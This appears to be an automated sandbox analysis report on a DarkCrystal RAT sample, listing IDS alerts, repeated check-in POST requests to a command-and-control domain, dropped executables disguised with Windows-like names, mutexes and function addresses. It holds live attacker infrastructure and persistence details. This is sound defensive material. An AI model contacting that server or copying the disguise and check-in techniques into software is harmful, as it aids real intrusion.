Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49805 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49773 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49865 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49894 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49915 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49943 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49964 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49834 -> 104.21.38.84:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 649521cm.renyash.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 649521cm.renyash.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 649521cm.renyash.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 649521cm.renyash.ruContent-Length: 332Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 649521cm.renyash.ru

Source: unknown

HTTP traffic detected: POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 649521cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: WinStore.App.exe, 00000006.00000002.2160917992.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000006.00000002.2160917992.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000003136000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.000000000306A000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.0000000003486000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.0000000003274000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.000000000350F000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000342D000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000325C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://649521cm.renyash.ru
Source: WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://649521cm.renyash.ru/
Source: WinStore.App.exe, 00000006.00000002.2160917992.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2285427563.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.000000000350F000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000325C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3301212074.000000000158A000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
Source: 67VB5TS184.exe, 00000000.00000002.2072053024.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000006.00000002.2160917992.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.000000000350F000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.000000000325C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000003A.00000002.3306289053.000000000365C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WinStore.App.exe, 00000006.00000002.2160917992.0000000003115000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000000C.00000002.2287328813.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000011.00000002.2417968978.000000000315E000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2504272058.0000000003092000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000001C.00000002.2635086774.00000000034AE000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000021.00000002.2761031345.000000000329C000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2885872421.0000000003708000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3012567103.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000030.00000002.3096698843.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3220889959.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.geoplugin.com/premium/

Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Windows\SysWOW64\sr-Latn-RS\0569fd69283a46	Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF847150D48	0_2_00007FF847150D48
Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF847150E43	0_2_00007FF847150E43
Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF847547FF8	0_2_00007FF847547FF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF848F30D48	6_2_00007FF848F30D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF848F30E43	6_2_00007FF848F30E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF84932E5A4	6_2_00007FF84932E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF8493290C3	6_2_00007FF8493290C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF849329BF2	6_2_00007FF849329BF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F406B6	12_2_00007FF848F406B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F30D48	12_2_00007FF848F30D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F30E43	12_2_00007FF848F30E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F6D9AD	12_2_00007FF848F6D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F61085	12_2_00007FF848F61085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF84932E5A4	12_2_00007FF84932E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF8493308C1	12_2_00007FF8493308C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF849329BF2	12_2_00007FF849329BF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF8493290C3	12_2_00007FF8493290C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF848F20D48	17_2_00007FF848F20D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF848F20E43	17_2_00007FF848F20E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF84931E5A4	17_2_00007FF84931E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF8493190C3	17_2_00007FF8493190C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F30D48	22_2_00007FF848F30D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F30E43	22_2_00007FF848F30E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F406B6	22_2_00007FF848F406B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F6D9AD	22_2_00007FF848F6D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F61085	22_2_00007FF848F61085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF84932E5A4	22_2_00007FF84932E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF8493290C3	22_2_00007FF8493290C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF849329BF2	22_2_00007FF849329BF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F306B6	28_2_00007FF848F306B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F5D9AD	28_2_00007FF848F5D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F51085	28_2_00007FF848F51085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F20D48	28_2_00007FF848F20D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F20E43	28_2_00007FF848F20E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF84931E5A4	28_2_00007FF84931E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF8493190C3	28_2_00007FF8493190C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF848F10D48	33_2_00007FF848F10D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF848F10E43	33_2_00007FF848F10E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF84930E5A4	33_2_00007FF84930E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF8493090C3	33_2_00007FF8493090C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF848F20D48	38_2_00007FF848F20D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF848F20E43	38_2_00007FF848F20E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF848F306B6	38_2_00007FF848F306B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF848F5D9AD	38_2_00007FF848F5D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF848F51085	38_2_00007FF848F51085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF84931E5A4	38_2_00007FF84931E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 38_2_00007FF8493190C3	38_2_00007FF8493190C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 43_2_00007FF848F40D48	43_2_00007FF848F40D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 43_2_00007FF848F40E43	43_2_00007FF848F40E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 43_2_00007FF84933E5A4	43_2_00007FF84933E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 43_2_00007FF8493390C3	43_2_00007FF8493390C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF848F406B6	48_2_00007FF848F406B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF848F30D48	48_2_00007FF848F30D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF848F30E43	48_2_00007FF848F30E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF848F6D9AD	48_2_00007FF848F6D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF848F61085	48_2_00007FF848F61085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF84932E5A4	48_2_00007FF84932E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF8493290C3	48_2_00007FF8493290C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 48_2_00007FF849329BF2	48_2_00007FF849329BF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF848F406B6	53_2_00007FF848F406B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF848F6D9AD	53_2_00007FF848F6D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF848F61085	53_2_00007FF848F61085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF848F30D48	53_2_00007FF848F30D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF848F30E43	53_2_00007FF848F30E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF84932E5A4	53_2_00007FF84932E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF8493308C1	53_2_00007FF8493308C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF849329BF2	53_2_00007FF849329BF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 53_2_00007FF8493290C3	53_2_00007FF8493290C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF848F206B6	58_2_00007FF848F206B6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF848F4D9AD	58_2_00007FF848F4D9AD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF848F41085	58_2_00007FF848F41085
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF848F10D48	58_2_00007FF848F10D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF848F10E43	58_2_00007FF848F10E43
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF84930E5A4	58_2_00007FF84930E5A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 58_2_00007FF8493090C3	58_2_00007FF8493090C3

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BJKEmTPo.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Code function: String function: 00007FF848F6C841 appears 40 times

Source: 67VB5TS184.exe, 00000000.00000000.2039485162.0000000000C86000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 67VB5TS184.exe
Source: 67VB5TS184.exe, 00000000.00000002.2076346328.000000001BA33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs 67VB5TS184.exe
Source: 67VB5TS184.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 67VB5TS184.exe

Source: 67VB5TS184.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 67VB5TS184.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hjAOLvfTLePJensZtANoSVrh.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hjAOLvfTLePJensZtANoSVrh.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WinStore.App.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SystemSettings.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 67VB5TS184.exe, Gp6SmQpVEw7W7SPVvrP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 67VB5TS184.exe, Gp6SmQpVEw7W7SPVvrP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 67VB5TS184.exe, Gp6SmQpVEw7W7SPVvrP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 67VB5TS184.exe, Gp6SmQpVEw7W7SPVvrP.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@100/99@1/1

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Program Files (x86)\windowspowershell\Modules\SystemSettings.exe

Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Users\user\Desktop\EVFwVPZl.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Kdw2wxPjwQNy3YcCFvJa
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
